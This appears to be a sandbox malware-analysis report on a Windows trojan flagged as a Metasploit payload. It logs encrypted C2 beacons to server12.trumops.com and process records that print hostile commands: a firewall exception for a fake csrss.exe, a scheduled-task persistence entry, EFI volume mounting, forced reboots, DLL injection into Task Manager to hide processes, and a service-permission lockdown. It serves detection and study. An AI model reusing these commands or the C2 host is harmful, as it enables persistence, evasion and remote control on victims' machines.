                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            2021-10-20 10:39:19 UTC27INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6192.168.2.649771172.67.139.144443C:\Windows\rss\csrss.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2021-10-20 10:39:42 UTC27OUTPOST /api/poll HTTP/1.1
                                                            Host: server12.trumops.com
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 YaBrowser/20.2.4.143 Yowser/2.5 Safari/537.36
                                                            Content-Length: 664
                                                            Accept-Encoding: gzip
                                                            2021-10-20 10:39:42 UTC27OUTData Raw: 62 66 37 6e 71 48 70 52 56 57 63 34 6f 49 36 2b 46 73 78 49 4b 35 50 70 5a 2f 44 50 36 63 71 44 5a 6d 4c 4d 79 6d 52 77 46 73 67 4b 63 62 79 2f 79 33 4c 32 38 75 42 48 38 6e 6c 49 67 76 35 6c 57 70 33 52 64 30 36 76 59 66 50 6b 6b 45 62 48 54 55 68 73 72 47 4b 53 47 6a 6c 6e 31 4c 4f 32 56 2f 72 4c 45 72 61 35 46 78 62 75 33 78 5a 52 4a 6a 78 53 34 62 64 79 39 2b 4b 65 66 71 37 32 44 4f 73 52 68 70 46 73 32 66 45 76 6c 4d 69 71 7a 73 57 6f 67 6c 4a 4d 59 6a 32 32 6c 73 2b 4a 76 2f 37 45 68 72 6f 76 65 75 74 4c 32 6e 52 33 4f 47 41 72 54 59 6a 2b 5a 69 63 4c 79 47 79 72 6c 54 72 57 38 68 4e 39 66 54 41 78 64 62 4f 58 75 59 31 43 52 72 50 71 5a 36 38 72 50 68 64 4b 2b 74 7a 56 46 35 4d 54 55 5a 71 74 64 4b 34 68 79 74 6f 43 71 35 51 53 6a 77 53 68 68 61 44
                                                            Data Ascii: bf7nqHpRVWc4oI6+FsxIK5PpZ/DP6cqDZmLMymRwFsgKcby/y3L28uBH8nlIgv5lWp3Rd06vYfPkkEbHTUhsrGKSGjln1LO2V/rLEra5Fxbu3xZRJjxS4bdy9+Kefq72DOsRhpFs2fEvlMiqzsWoglJMYj22ls+Jv/7EhroveutL2nR3OGArTYj+ZicLyGyrlTrW8hN9fTAxdbOXuY1CRrPqZ68rPhdK+tzVF5MTUZqtdK4hytoCq5QSjwShhaD
                                                            2021-10-20 10:39:42 UTC28INHTTP/1.1 404 Not Found
                                                            Date: Wed, 20 Oct 2021 10:39:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.11
                                                            set-cookie: PHPSESSID=ihictia5gvlqkfgn9rmhuf8pgc; path=/; HttpOnly
                                                            expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            cache-control: no-store, no-cache, must-revalidate
                                                            pragma: no-cache
                                                            access-control-allow-credentials: false
                                                            CF-Cache-Status: DYNAMIC
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VuZcu8Rp0SwcfAOzPsHBuPj8LCUZ6Ql2CEt1HD5sqBnqtU7hoJEDNbHv2yW9Dp%2FVUrCT%2FMt5dFBhjq16uaYLIFwI0FrCkFe%2BuY0VdV4IHuLCKxmh8AywoOMlraByjzwDwLVsZ8YsgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6a119fb55fa42488-FRA
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            2021-10-20 10:39:42 UTC29INData Raw: 65 38 0d 0a 32 30 32 4f 64 45 73 61 45 56 7a 6c 37 35 66 79 6c 72 52 75 6c 48 58 64 71 39 48 4d 69 75 4e 4f 6a 78 41 65 63 4f 67 72 2f 59 6d 6e 37 51 58 30 79 62 31 36 46 42 67 53 71 6d 31 6d 36 4e 53 42 30 4c 4b 77 79 64 71 4a 6c 56 58 63 55 49 42 56 64 63 79 32 62 35 42 4d 6a 55 7a 36 36 69 79 63 4c 72 75 6d 79 35 37 51 48 4e 4d 72 62 6d 57 6a 59 6a 4d 46 72 4d 52 75 6a 6e 43 50 47 64 32 47 2f 72 4f 37 79 39 48 50 58 35 39 65 61 73 47 4e 42 6d 65 64 79 37 47 44 69 2b 70 78 52 63 68 7a 74 30 4f 53 51 37 45 69 76 2b 6b 51 53 6b 42 66 46 39 54 4e 48 73 38 5a 53 4e 56 63 4f 4a 4c 74 78 2b 78 70 7a 6c 72 46 6d 51 54 34 36 63 70 6f 7a 48 77 6a 35 63 31 6a 41 46 30 61 39 6c 4a 6a 43 64 4a 74 41 67 3d 3d 0d 0a
                                                            Data Ascii: e8202OdEsaEVzl75fylrRulHXdq9HMiuNOjxAecOgr/Ymn7QX0yb16FBgSqm1m6NSB0LKwydqJlVXcUIBVdcy2b5BMjUz66iycLrumy57QHNMrbmWjYjMFrMRujnCPGd2G/rO7y9HPX59easGNBmedy7GDi+pxRchzt0OSQ7Eiv+kQSkBfF9TNHs8ZSNVcOJLtx+xpzlrFmQT46cpozHwj5c1jAF0a9lJjCdJtAg==
                                                            2021-10-20 10:39:42 UTC29INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7192.168.2.649855172.67.139.144443C:\Windows\rss\csrss.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2021-10-20 10:41:01 UTC29OUTPOST /api/poll HTTP/1.1
                                                            Host: server12.trumops.com
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
                                                            Content-Length: 664
                                                            Accept-Encoding: gzip
                                                            2021-10-20 10:41:01 UTC29OUTData Raw: 54 4c 63 6b 76 68 52 73 61 58 44 4a 4b 7a 53 75 4b 69 78 63 71 4b 79 65 4d 6d 6f 4f 76 79 6e 4c 55 58 61 2f 35 68 5a 45 54 6a 4e 45 66 73 33 6a 4f 4c 55 4e 71 75 45 67 37 70 45 51 6d 34 68 53 2f 78 42 36 4a 57 6c 51 59 30 4f 31 51 78 74 49 55 77 73 56 54 50 65 2b 4e 35 6b 65 78 65 4d 4e 67 46 63 63 41 77 41 43 49 4b 6b 6e 68 75 57 47 6b 6e 64 54 54 32 6e 46 45 6b 41 70 56 4f 71 6d 4f 75 6f 6f 37 7a 45 75 6f 49 52 66 75 33 5a 75 73 71 34 70 57 70 79 50 77 73 58 70 43 31 47 49 72 65 35 38 50 39 43 76 48 52 47 2b 77 74 42 6b 32 45 54 50 65 37 78 34 6b 42 34 31 78 35 57 47 39 33 50 4c 63 42 44 35 4e 6a 32 47 47 51 36 30 79 48 51 33 71 31 58 67 35 63 35 31 4b 35 57 56 53 2b 6f 34 6d 31 57 77 4b 62 68 54 4c 56 6e 6e 67 4a 5a 32 34 59 4b 6e 4c 63 71 79 71 41 35
                                                            Data Ascii: TLckvhRsaXDJKzSuKixcqKyeMmoOvynLUXa/5hZETjNEfs3jOLUNquEg7pEQm4hS/xB6JWlQY0O1QxtIUwsVTPe+N5kexeMNgFccAwACIKknhuWGkndTT2nFEkApVOqmOuoo7zEuoIRfu3Zusq4pWpyPwsXpC1GIre58P9CvHRG+wtBk2ETPe7x4kB41x5WG93PLcBD5Nj2GGQ60yHQ3q1Xg5c51K5WVS+o4m1WwKbhTLVnngJZ24YKnLcqyqA5
                                                            2021-10-20 10:41:01 UTC30INHTTP/1.1 404 Not Found
                                                            Date: Wed, 20 Oct 2021 10:41:01 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.11
                                                            set-cookie: PHPSESSID=r0bvjm1tq2m76j34nbfn7o10n5; path=/; HttpOnly
                                                            expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            cache-control: no-store, no-cache, must-revalidate
                                                            pragma: no-cache
                                                            access-control-allow-credentials: false
                                                            CF-Cache-Status: DYNAMIC
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4VproYKIjqRa5RSHQqMpqU3WrJiRn2KWRmnj96dUzXH3TZePk9Kqh%2F4AwUlTri5%2FQ9kQkVvBt%2B3ca7g1AsCTMQt5dvyz91Q3y2ZTNtGrdiVJaPbYOuTh0im3PuIagx%2BOd7HgGnw%2FQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6a11a19e1ed14de2-FRA
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            2021-10-20 10:41:01 UTC31INData Raw: 65 38 0d 0a 51 51 4d 6e 49 39 41 45 6b 66 68 4b 35 4e 51 30 49 6c 62 63 75 61 6d 6a 65 39 45 64 2f 42 59 58 57 34 42 42 47 37 4d 6b 50 71 44 50 6b 32 72 6c 4e 4d 67 35 37 6e 66 58 68 55 79 6c 30 63 49 6b 79 41 6b 55 33 70 67 4b 61 62 43 46 53 56 79 34 45 69 34 6c 32 66 2b 56 73 6c 55 6a 6a 59 30 55 51 55 62 65 74 63 62 64 36 76 7a 38 62 50 35 50 4f 58 37 65 47 51 6f 75 61 32 2f 79 6e 4a 58 37 6e 46 35 65 57 4a 67 31 35 45 34 34 57 4b 66 38 4e 32 79 6e 35 74 48 57 4e 32 34 58 41 46 5a 37 76 44 43 30 62 4e 2f 42 4d 6d 36 5a 44 6a 6a 52 61 4d 7a 65 72 53 6f 68 58 34 50 4a 68 68 53 34 4d 46 5a 52 6e 58 49 57 43 4c 75 65 69 57 47 51 6e 66 62 74 48 30 63 32 2b 71 63 50 6b 32 64 78 75 54 7a 43 58 51 3d 3d 0d 0a
                                                            Data Ascii: e8QQMnI9AEkfhK5NQ0Ilbcuamje9Ed/BYXW4BBG7MkPqDPk2rlNMg57nfXhUyl0cIkyAkU3pgKabCFSVy4Ei4l2f+VslUjjY0UQUbetcbd6vz8bP5POX7eGQoua2/ynJX7nF5eWJg15E44WKf8N2yn5tHWN24XAFZ7vDC0bN/BMm6ZDjjRaMzerSohX4PJhhS4MFZRnXIWCLueiWGQnfbtH0c2+qcPk2dxuTzCXQ==
                                                            2021-10-20 10:41:01 UTC31INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Code Manipulations

                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Start time:12:38:43
                                                            Start date:20/10/2021
                                                            Path:C:\Users\user\Desktop\f6oNLRKHUy.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Users\user\Desktop\f6oNLRKHUy.exe'
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                                            Reputation:low

                                                            General

                                                            Start time:12:38:46
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\servicing\TrustedInstaller.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\servicing\TrustedInstaller.exe
                                                            Imagebase:0x7ff764c00000
                                                            File size:131584 bytes
                                                            MD5 hash:4578046C54A954C917BB393B70BA0AEB
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:12:38:46
                                                            Start date:20/10/2021
                                                            Path:C:\Users\user\Desktop\f6oNLRKHUy.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\f6oNLRKHUy.exe
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                                            Reputation:low

                                                            General

                                                            Start time:12:38:48
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                            Imagebase:0x7ff6b7590000
                                                            File size:51288 bytes
                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:12:38:48
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'
                                                            Imagebase:0x7ff7180e0000
                                                            File size:273920 bytes
                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:12:38:48
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:12:38:49
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\netsh.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes
                                                            Imagebase:0x7ff75b430000
                                                            File size:92672 bytes
                                                            MD5 hash:98CC37BBF363A38834253E22C80A8F32
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:12:38:50
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\rss\csrss.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\rss\csrss.exe ''
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 31%, Metadefender, Browse
                                                            • Detection: 52%, ReversingLabs
                                                            Reputation:low

                                                            General

                                                            Start time:12:38:52
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F
                                                            Imagebase:0x7ff787550000
                                                            File size:226816 bytes
                                                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:12:38:53
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:12:38:53
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /delete /tn ScheduledUpdate /f
                                                            Imagebase:0x7ff787550000
                                                            File size:226816 bytes
                                                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:38:53
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:38:53
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\SysWOW64\mountvol.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:mountvol B: /s
                                                            Imagebase:0x30000
                                                            File size:15360 bytes
                                                            MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:38:54
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:38:55
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\rss\csrss.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\rss\csrss.exe
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, Author: Joe Security

                                                            General

                                                            Start time:12:38:55
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\SysWOW64\mountvol.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:mountvol B: /d
                                                            Imagebase:0x30000
                                                            File size:15360 bytes
                                                            MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:38:55
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:38:56
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\SysWOW64\mountvol.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:mountvol B: /s
                                                            Imagebase:0x7ff6b7590000
                                                            File size:15360 bytes
                                                            MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:38:56
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\rss\csrss.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\rss\csrss.exe
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, Author: Joe Security

                                                            General

                                                            Start time:12:38:57
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:00
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\SysWOW64\mountvol.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:mountvol B: /d
                                                            Imagebase:0x30000
                                                            File size:15360 bytes
                                                            MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:01
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:03
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\rss\csrss.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Windows\rss\csrss.exe'
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, Author: Joe Security

                                                            General

                                                            Start time:12:39:04
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\SysWOW64\shutdown.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:shutdown -r -t 5
                                                            Imagebase:0xdf0000
                                                            File size:23552 bytes
                                                            MD5 hash:E2EB9CC0FE26E28406FB6F82F8E81B26
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:04
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:05
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\rss\csrss.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\rss\csrss.exe
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, Author: Joe Security

                                                            General

                                                            Start time:12:39:08
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                            Imagebase:0x7ff6b7590000
                                                            File size:51288 bytes
                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:11
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                            Imagebase:0x7ff6b7590000
                                                            File size:51288 bytes
                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:12
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\rss\csrss.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Windows\rss\csrss.exe'
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp, Author: Joe Security

                                                            General

                                                            Start time:12:39:13
                                                            Start date:20/10/2021
                                                            Path:C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                            Imagebase:0x7ff6a0090000
                                                            File size:288256 bytes
                                                            MD5 hash:D98E33B66343E7C96158444127A117F6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 14%, Metadefender, Browse
                                                            • Detection: 73%, ReversingLabs

                                                            General

                                                            Start time:12:39:14
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:14
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\windefender.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\windefender.exe
                                                            Imagebase:0x400000
                                                            File size:2102272 bytes
                                                            MD5 hash:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 29%, Metadefender, Browse
                                                            • Detection: 57%, ReversingLabs

                                                            General

                                                            Start time:12:39:15
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\rss\csrss.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\rss\csrss.exe
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000026.00000002.426639210.0000000000401000.00000040.00020000.sdmp, Author: Joe Security

                                                            General

                                                            Start time:12:39:15
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:16
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
